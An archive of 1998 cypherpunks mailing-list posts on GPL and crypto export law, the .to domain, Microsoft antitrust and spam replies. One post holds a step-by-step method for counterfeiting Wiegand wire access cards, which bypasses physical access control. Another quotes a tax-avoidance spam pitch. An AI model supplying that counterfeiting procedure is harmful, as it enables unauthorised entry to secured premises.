Date: Wed, 30 Sep 1998 15:04:02 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <sjmzpbhwer4.fsf@indiana.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



The big issue I see with GPL and Crypto software is that with the GPL
you cannot add any redistribution restrictions.  The problem is that
due to the United States export rules, I cannot export Crypto
software, which means I must legally put a restriction on any Crypto
code I write.  But, this is a "further restriction" as far as the
GPL is concerned.  This, in turn, means I cannot use the GPL for
Crypto software.

-derek
-- 
       Derek Atkins, SB '93 MIT EE, SM '95 MIT Media Laboratory
       Member, MIT Student Information Processing Board  (SIPB)
       URL: http://web.mit.edu/warlord/    PP-ASEL-IA     N1NWH
       warlord@MIT.EDU                        PGP key available




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Sep 1998 16:09:53 +0800
To: cypherpunks@cyberpass.net
Subject: Is the .to (Tonga) domain completely rogue and should be removed?
Message-ID: <v04011721b2384a0a8abc@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



:-).

Cheers,
Bob Hettinga

--- begin forwarded text


Date: Wed, 30 Sep 1998 15:24:09 -0400
Reply-To: bzs@world.std.com
Originator: com-priv@lists.psi.com
Sender: com-priv@lists.psi.com
Precedence: bulk
From: Barry Shein <bzs@world.std.com>
To: Multiple recipients of list <com-priv@lists.psi.com>
Subject: Is the .to (Tonga) domain completely rogue and should be removed?
X-Comment:  Commercialization and Privatization of the Internet


We've been having increasing problems with one or more porn sites in
the .to domain promoting itself by massive spamming of AOL customers
using one of our domains in their From: header thus causing both
complaints to us and thousands of bounces from AOL due to bad AOL
addresses in their spam lists.

Looking at the .to domain I can't help but notice it's heavily laden
with what appear to be porn sites (sexonline.to, come.to,
xxxhardcore.to, etc.)

1. Performing traceroutes and other analyses seems to indicate that
this domain is NOT being used for communication with entities
legitimately located (legally, not only geographically) within the
sovereignty of the Kingdom of Tonga, as intended.

2. Clearly criminal and malicious activites are arising from sites to
which Tonga has provided comfort and sanctuary.

3. Therefore, I call for a process whereby it can be determined as to
whether or not it is appropriate to decommission the Tongan domain due
to negligence, mismanagement, and having allowed it to become an
attractive resource for criminal activities. I do not believe the
Tongan domain serves any legitimate purpose as an internet resource.

In support of this assertion I want to show you an SMTP conversation
with what claims to be the Consulate of the Government of Tonga in San
Francisco (This San Francisco office is listed as an official Tongan
contact point for visas etc by the US State Dept):

world% telnet sfconsulate.gov.to 25
Trying 209.24.51.169...
Connected to sfconsulate.gov.to.
Escape character is '^]'.
220 colo.to SMTP ready, Who are you gonna pretend to be today?
VRFY postmaster
500 Bloody Amateur! Proper forging of mail requires recognizable SMTP commands!

--------------------

Viewing the web page for the Tongan Consulate in the US
(http://sfconsulate.gov.to) reveals nothing but an ad for a software
company, this page ends with:

   Need a domain name? Contact the Kingdom of Tonga Internet domain name
                                 registry.

--------------------

Consequently, I assert there is no reason for this domain to exist and
it should be removed from the root name servers.


--
        -Barry Shein

Software Tool & Die    | bzs@world.std.com          | http://www.world.com
Purveyors to the Trade | Voice: 617-739-0202        | Login: 617-739-WRLD
The World              | Public Access Internet     | Since 1989     *oo*

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Wed, 30 Sep 1998 18:19:43 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: IP: Chinese Govt Bans Controversial Clinton Book
In-Reply-To: <199809302133.OAA25687@netcom13.netcom.com>
Message-ID: <Pine.LNX.3.96.980930171804.489E-100000@mothra.fastrans.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 30 Sep 1998, Vladimir Z. Nuri wrote:

> 
> From: believer@telepath.com
> Subject: IP: Chinese Govt Bans Controversial Clinton Book
> Date: Wed, 30 Sep 1998 09:16:35 -0500
> To: believer@telepath.com
> 
> Source:  US Newswire
> http://www.usnewswire.com/topnews/Current_Releases/0929-126.txt
> 
> PRIMA: Chinese Government Bans Controversial Clinton Book
> U.S. Newswire
> 29 Sep 15:06
> 
>  PRIMA Publishing: Chinese Government Bans Controversial Clinton
> Book
>  To: National Desk
....

> 
>    Chinese authorities have refused to allow three publishing
> houses to translate a new book -- "The Clinton Syndrome, The
> President and the Self-Destructive Nature of Sexual Addiction" by

Wonder what they would think of "The Secret Life of Bill Clinton"
by Ambrose Evans-Pritchard.  Pretty amazing book.

My guess is that they don't want their top spy in the US sullied
by "hearsay".  ;-)

jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@openpgp.net>
Date: Wed, 30 Sep 1998 19:53:56 +0800
To: emailking.associates@cwix.com
Subject: Re: advertisement
In-Reply-To: <199809301343.IAA11432@einstein.ssz.com>
Message-ID: <Pine.LNX.4.02.9809301749580.22375-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 28 Sep 1998 emailking.associates@cwix.com wrote:

>Date: Mon, 28 Sep 1998 10:33:26
>From: emailking.associates@cwix.com
>To: cypherpunks@einstein.ssz.com
>Subject: advertisement
>
>
>This Message was Composed using Extractor Pro '98 Bulk E- Mail 
>Software. If 
>you wish to be removed from this advertiser's future mailings, 
>please reply 
>with the subject "Remove" and this software will automatically 
>block you 
>from their future mailings.
<SnIpPaGe>
>1-800-781-7046 ext.6053
>
>If you do not wish to receive this message hit "reply" and type 
>"remove" in the subject line and you
>will atomatically be removed from future mailings. Sorry if this 
>was an inconvenience to you.


I am impressed, this thing follows the laws of California, mighty
impressive.  Both a 1-800 number to call, an email address of a real
person and an automated removal...  And it even had an address in it!

Spammers are starting to kinda follow laws.. if only they would follows
rules, like "SPAMMING IS BAD!" but that wont happen... 

just my $0.02 worth

Max
--   Max Inux <maxinux@openpgp.net>  Hey Christy!!! KeyID 0x8907E9E5
Kinky Sex makes the world go round O R Strong crypto makes the world safe
       If crypto is outlawed only outlaws will have crypto
Fingerprint(Photo Also): 259D 59F7 D98C CD73 1ACD 54Ea 6C43 4877 8907 E9E5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RedRook <redrook@yahoo.com>
Date: Wed, 30 Sep 1998 20:16:03 +0800
To: ravage@einstein.ssz.com
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <19981001011807.25359.rocketmail@send103.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



> -----Original Message-----
> From: Jim Choate [mailto:ravage@einstein.ssz.com]
> Sent: Wednesday, September 30, 1998 4:38 PM
[deletia]
> The reality is that we don't live in a free-market, 
> but rather a rather lightly regulated one. 
> Microsoft got a tad too greedy in fixing their
> software so that specific competitors would 
> not be able to use it, this in
> itself may not be a crime. However it 
> *does* deny the consumer the choice
> and that most certainly is a crime.

Please elaborate. Netscape works fine on Windows 98, and faces the
same restrictions with installation that original Windows 95 had. 

As for Java, Java works as well on Windows as on any other platform. 

It's funny how giving the customers more value for their money, always
ends up being anti-competative. It's a thorny issue that's not easy to
deal with. Especially with Microsoft. They have such a large pool of
source code, so many employees, and such an effective distribution
network, that they can quickly add a jillion features to any program,
and make so much money off of it, that it's difficult for anyone but a
multi-million dollar company to compete

And no, taking the browser out of Windows is not going to change that.

Harv.
RedRook@yahoo.com
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 30 Sep 1998 20:26:17 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284714@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate wrote:
> The reality is that we don't live in a free-market, but 
> rather a rather lightly regulated one.

Lightly? You jest. No, we certainly don't live in a free market, we have
a mixed economy. We *should* have a free market, government distortions
are much more destructive and pervasive than any potential abuses by
market leaders. Also, the latter abuses are naturally corrected by
competition, not necessarily immediate but certainly faster than
government distortions which they blame on the market as an excuse for
*more* government distortions.

The answer for establishing "rules" which insure "fairness," such as
preventing an OS vendor from conspiring against a single application
vendor and intentionally breaking their product or enforcing artificial
incompatibilities, is to create a framework for standards, peer-review,
arbitration and liability to enforce "fair" industry practice and
competition. Make it a contractually issue and not a criminal one,
reputation for punishment instead of life and liberty, and an optional
and competitive system instead of a compelled and monopolistic one. An
optional system must have an overall and mutual benefit for all parties
involved, the government has no such limitation and becomes an
instrument for theft.

We have two paths for international commerce and regulation, we can
continue to the New World Order (NWO), or we can divorce the supporting
infrastructure from the geopolitical power base.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Sep 1998 18:36:07 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)
Message-ID: <199809302334.SAA14765@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 30 Sep 1998 15:25:34 -0700 (PDT)
> From: bram <bram@gawth.com>
> Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)

> I've never heard anyone say it's unfair, I've just heard people claim that

You haven't been reading this thread very closely have you?

Lot's of organizations and people are claiming it's unfair in their refusal
to use it based upon the conditions of code distribution.

"It's not fair, I can't make money off your work.....<whine, whine, whine>"


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 30 Sep 1998 18:36:26 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199809302337.SAA14813@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Wed, 30 Sep 1998 15:25:32 -0700

> statements), so why should the government step in and force something
> that is contrary to the market?

If Microsofts actions were prohibitive and they didn't set out with specific
intentions of denying fair competition (there have been quite a few
documents and transcripts released that show this pre-meditated intent) then
it wouldn't need to.

The reality is that we don't live in a free-market, but rather a rather
lightly regulated one. Microsoft got a tad too greedy in fixing their
software so that specific competitors would not be able to use it, this in
itself may not be a crime. However it *does* deny the consumer the choice
and that most certainly is a crime.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@openpgp.net>
Date: Wed, 30 Sep 1998 20:40:20 +0800
To: business_ideas@usa.net
Subject: Re: Increase Your Paycheck Next Week
In-Reply-To: <199809301608.JAA07148@cyberpass.net>
Message-ID: <Pine.LNX.4.02.9809301837420.23648-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 30 Sep 1998 2001files@usa.net wrote:

Dear spammer,

Nice threats are attached to this spam.  I love new ideas from the
spamming community. Please be aware by not  including a real human email
address (specifically stated) and a 1800 number to call to be removed,
you are in violation of California law.  

Max Inux

>Date: Wed, 30 Sep 1998 09:08:07 -0700 (PDT)
>From: 2001files@usa.net
>Reply-To: business_ideas@usa.net
>To: cypherpunks@cyberpass.net
>Subject: Increase Your Paycheck Next Week
>
>
>Would you like to get a pay raise next week without asking your boss?   Then this very special report, "Money Power," is for you!
>
>If you have a regular job - not working in your own or a family business - and you get a regular paycheck, we can show you how you can give yourself a HUGE RAISE in your very next paycheck.  At least between 20% - 30% more than what you are getting now.  Yes, your paycheck will be increased substantially!
>
>	* Example:  If your take home pay is $400 net per week, you can take home $440 - $500 the very next week and every week thereafter!
>
>No Gimmicks!  Everything is perfectly legal.
>
>"Money Power" is written in three parts:
>
>	*Part I - shows you exactly what to do so you can give yourself a raise in your next paycheck.  You decide how big a pay raise you want to give yourself!
>
>	*Part II -  shows you how to protect yourself, your family, your home, and your assets without paying big money -- just $85 per year to legally protect your liability 100% against bill collectors and debts.
>
>	*Part III - shows you how you can legally deduct household expenses - utilities, gardener, supplies, repairs, and more from your income taxes.  Absolutely No Gimmicks!  Everything is legal.
>
>This is NOT a "get rich quick" scheme or some other scam.  We are sure you have seen lots of them.  And this is NOT a "tax protester" who refuses to pay income taxes.  The author of this report pays taxes every year - of course, as little as legally possible.  It's our opinion it is not good to zero out completely.  But, you can - it's your choice.
>
>Using the methods in this report, the rich become richer.  And poor people become poorer when they don't take advantage of these techniques.  Your chances of being audited by the IRS - just for using these methods - are near zero.
>
>	* We are so sure "Money Power" will work for you, here is our risk-free guarantee.  If you don't get at least 100 times more money in your paycheck in one year than the cost of this report, we will double your money back!  How's that for a guarantee?
>                      ---------------------------------
>
>Now, here's one more offer you will find hard to refuse.  We have a Reseller Program whereby you can make money selling this report.  When you purchase "Money Power," you will also get 1,000 FREE places to advertise on the Internet!  If you want to make some extra money - $500, $1,000 or more - just post ads on those sites and have the orders come to you.  For every order you send us, we will pay you $5.00:
>	*You don't need a merchant account to process orders!  We do that.
>	*You don't have to warehouse any inventory!  We do that.
>	*You don't have to ship any merchandise.  We do that.
>All you have to do is send us the orders.  We'll process checks, money orders, and credit cards and we will pack and mail the report.  And you get paid twice a month - on the 15th and the 30th!
>                     ------------------------------------
>
>
>
>And, listen.  America is a free country.  If you don't want an increase in your paycheck, that's fine.  And if you don't want to know how to protect your family, that's OK, too.  And if you don't want to save money on taxes, that's quite all right.  You are living in a free country.
>
>But, if you need money - more money in your paycheck, act right now!  
>
>The author of this report used to work for Corporate America earning over $100,000 a year.  After paying almost 40% in Federal taxes, 6.2% for Social Security, 1.45% for Medicare, 1.5% for the unemployment fund, and 3% for his employee benefits, he would bring home less than half of his yearly salary!  And then there was state income tax to pay!   He decided he had to do something so he could keep all the money!
>
>"Money Power" is the result of the author's frustration and aggravation with the system and the research he did to change his situation.  These are methods they don't teach you in school!
>
>It can't get much better than this.  This is a once in a lifetime opportunity because you may not receive this message again.  And you know how it is with opportunities ..... if you pass on one, you are not entitled to another for a long time.
>
>
>Don't Delay!  The longer you wait to order, the longer you will wait for your raise!!!!
>
>
>	>>>>>>>>>>>>> Please Note:  This report is for U.S. Citizens and Green Card holders only!  This program will not work for illegal immigrants or foreigners.<<<<<<<<<<<<
>
>---------------------------------------------------------------------------
>
>Here's how to order:
>
>*****To order online, click on your reply button and type ORDER ONLINE in the subject line and we will e-mail you the online order form.
>
>                             OR
>
>Print out the convenient order form below NOW and mail it to:
>
>	World Net Press
>	Dept. EN-930
>	P.O. Box 96594
>	Las Vegas, NV 89193-6594
>	
>Payment Method:  
>_____ Check     
>_____ Money Order
>_____ Visa
>_____ MasterCard
>_____ American Express
>_____ Discover
>
>_____ Yes, I want to order my copy of  "Money Power".  Price is $9.95 + $3.95 S/H = $13.90 and my order will be shipped by 1st Class Mail.   
>
>Name_________________________________________________________________________
>
>Address______________________________________________________________________
>
>City/State/Zip_______________________________________________________________
>
>Daytime Phone (__________)___________________________________________________
>
>E-Mail Address_______________________________________________________________
>
>Credit Card #_____________________________________________ Exp. Date_________
>
>Cardholder Name (as it appears on the card)__________________________________
>
>(Please make sure you include your phone number and e-mail address in case we have a question about your order.  Your credit card billing will reflect Road to Wealth, Inc.)
>
>
>
>**************************************************************************
>We are currently consolidating our mailing lists and need to update our database.  Our records indicate you may have inquired in the past. If this message has reached you in error, or the information is not correct, please accept our apology.  Follow the instructions below to be removed and we will honor your request.  We do not knowingly engage in spam of any kind.
>
>Please click on your reply button and type REMOVE in the subject line only.  The software reads only the subject line, not the body of the message.
>**************************************************************************
>
>Please be advised we collect the e-mail addresses of all flamers, hackers, and users of abusive and vulgar language.  We submit these addresses to the FBI and Interpol on a monthly basis.  
>
>
>
>


--   Max Inux <maxinux@openpgp.net>  Hey Christy!!! KeyID 0x8907E9E5
Kinky Sex makes the world go round O R Strong crypto makes the world safe
       If crypto is outlawed only outlaws will have crypto
Fingerprint(Photo Also): 259D 59F7 D98C CD73 1ACD 54Ea 6C43 4877 8907 E9E5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 30 Sep 1998 20:47:18 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: Internet is a dog named Toto
Message-ID: <33CCFE438B9DD01192E800A024C84A19284715@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




"Keep thought: If the Internet were a dog, it might be named Toto. Like
that little yapper in the famous film whose bark had some bite, the
Internet is yanking back the curtains and exposing the powers that be
for what they are: big-mouthed, fast-talking "wizards" about to be run
out of town."

(from http://www.business2.com/articles/issue1.html)


For some reason when I read this paragraph, it had an oddly strange
parallel meaning. ;)

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Sep 1998 18:48:39 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Is the .to (Tonga) domain completely rogue and should be removed? (fwd)
Message-ID: <199809302351.SAA14932@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 30 Sep 1998 16:50:34 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Is the .to (Tonga) domain completely rogue and should be removed?

> 1. Performing traceroutes and other analyses seems to indicate that
> this domain is NOT being used for communication with entities
> legitimately located (legally, not only geographically) within the
> sovereignty of the Kingdom of Tonga, as intended.

Intended by who? As far as I know there are no legal limitations on applying
for and receiving a domain from anywhere through the suitable authority.
There is most certainly zero law that regulates where the owners of those
domains may reside or operate.

Snark hunt.

> 2. Clearly criminal and malicious activites are arising from sites to
> which Tonga has provided comfort and sanctuary.

I got nothing against nailing spammers, but simply being a sex related site
isn't a crime.

> 3. Therefore, I call for a process whereby it can be determined as to
> whether or not it is appropriate to decommission the Tongan domain due
> to negligence, mismanagement, and having allowed it to become an
> attractive resource for criminal activities. I do not believe the
> Tongan domain serves any legitimate purpose as an internet resource.

Irrelevant unless you own the right to administre the tonga domain.

Do you?

I vote *NO*.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 30 Sep 1998 19:10:48 +0800
To: cypherpunks@toad.com
Subject: FBI Responds to Barr
Message-ID: <199810010000.UAA06013@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The FBI today responded to accusations by Rep. Bob Barr 
of "an effort by the Department of Justice to obtain massive 
new enforcement powers in the closing days of the 105th 
Congress":

   http://jya.com/fbi-barr.htm

DoJ promises to provide a response tomorrow.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Sep 1998 19:57:03 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: advertisement (fwd)
Message-ID: <199810010059.TAA15358@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 30 Sep 1998 17:53:09 -0700 (PWT)
> From: Max Inux <maxinux@openpgp.net>
> Subject: Re: advertisement

> <SnIpPaGe>
> >1-800-781-7046 ext.6053

> I am impressed, this thing follows the laws of California, mighty
> impressive.  Both a 1-800 number to call, an email address of a real

I called and requested they take all ssz.com addresses from all their lists.
I also passed the number along to quite a few anti-spammers. You really
should avail yourself of the opportunity to leave the gentleman a nice
considerate message.

As to having auto-mated removal, I didn't ask to be added so somebody want
to explain to me why I should do anything to stop receiving this traffic?
Seems to me the only ethical mechanism it auto-remove on first transmission
without a subscription request.

Computers are *supposed* to make our lives *easier*. Some folks seem to have
forgotten this.

    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 30 Sep 1998 21:47:33 +0800
To: Emile Zola <george_partington@Intertec.com
Subject: next article?
Message-ID: <3612EA34.73B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

False Security

		        William H. Payne	
                                   
  			Abstract

"Why 130 million Wiegand cards are in use throughout the world .

The most secure of all access card technologies.

HID Wiegand cards are virtually impossible to counterfeit... any attempt
to 
alter them destroys them! ...

Since no direct contact with the card is required, they are totally
enclosed,
making them absolutely immune to the elements and a frustration of
vandals. ... 

     	The secrets to the security of an
  	HID Wiegand card are those little
      	enclosed wire strips. Once corrupted,
  	they won't work."

Access Control & SECURITY SYSTEMS INTEGRATION, September 1998
www.prox.com  http/www.securitysolutions.com 
http://www.securitysolutions.com/

Bullshit.

	Fumble, Bumble and Inept Funds Electronic Lock Breaking at
	Sandia National Laboratories.

Zola http://zolatimes.com/

Would this be worth some bucks?

Want another FUN article? 

http://www.zolatimes.com/v2.29/bw1.html
http://www.aci.net/kalliste/bw1

I would need a BRILLIANT EDITOR to help polish
the ms.  http://www.aci.net/kalliste/

On the other hand, we POSSSIBLY could get this UNFORTUNATE MATTER
SETTLED before it gets WORSE.

biru
copyright bill payne 9/30/98 7:27 PM


Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Sep 1998 21:05:54 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810010207.VAA15977@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Wed, 30 Sep 1998 18:24:02 -0700

> Jim Choate wrote:
> > The reality is that we don't live in a free-market, but 
> > rather a rather lightly regulated one.
> 
> Lightly? You jest.

No I don't. I can start a business for as little as $15 to register a DBA
and I don't need licenses or other sorts of regulatory permissions. If I
sell a product or service (some are exempt, check your local area) I'll need
a tax number to pay my state sales tax (though they do nothing to regulate
my business other than specify that I must pay x% of my sales to the
community). Getting that tax number is free. Outside of that (at least in
Texas) I'm ready to go.

Yep, that's a lot of regulation, no forms or permission slips from some
in loco parentis, no reports or annual fees.

> No, we certainly don't live in a free market, we have
> a mixed economy. We *should* have a free market,

No we shouldn't. The fact that monopolies can exist in this lightly
regulated economy is ample evidence that the non-regulated or free-market
theory is nothing more than another pie-in-the-sky utopian dream.
Unrealistic and unrealizable.

If you seriously think this is a heavily regulated market you should do more
research into such places as Nazi Germany, Russia, China, etc.

> are much more destructive and pervasive than any potential abuses by
> market leaders.

Monopolies are monopolies, claiming that they will be less abusive in a
regulated market than in a free-market just demonstrates a lack of
understanding of basic human instincts.

You are claiming that if we do away with the food regulations that McDonalds
will be *more* concerned about their meat being cooked thoroughly then you
obviously don't understand people who chase the bottem line to the exclusion
of all else.

> Also, the latter abuses are naturally corrected by
> competition,

If a market monopolizes there is *NO* competition. If the market is one that
takes a large investment in intellectual or capital materials then there
won't be any opportunity to even attempt to start a competitive venture.

> The answer for establishing "rules" which insure "fairness," such as

Fairness is about the consumer, not the manufacturer. This misunderstanding
(if not intentional misdirection) by free-market mavens is at least one
indication why it won't work.

> competition. Make it a contractually issue and not a criminal one,

Contractual with who?

> reputation for punishment instead of life and liberty, 

Businesses are neither alive nor do they enjoy liberty. Don't confuse people
with systems and objects.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Sep 1998 21:09:16 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810010212.VAA16034@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 30 Sep 1998 18:18:07 -0700 (PDT)
